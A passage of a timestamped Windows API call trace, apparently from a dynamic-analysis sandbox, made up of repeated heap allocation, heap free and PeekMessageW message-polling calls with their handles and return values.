HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0130.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0130.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0130.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0130.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.340] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.379] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.380] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.381] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.382] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.382] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.382] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.382] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, 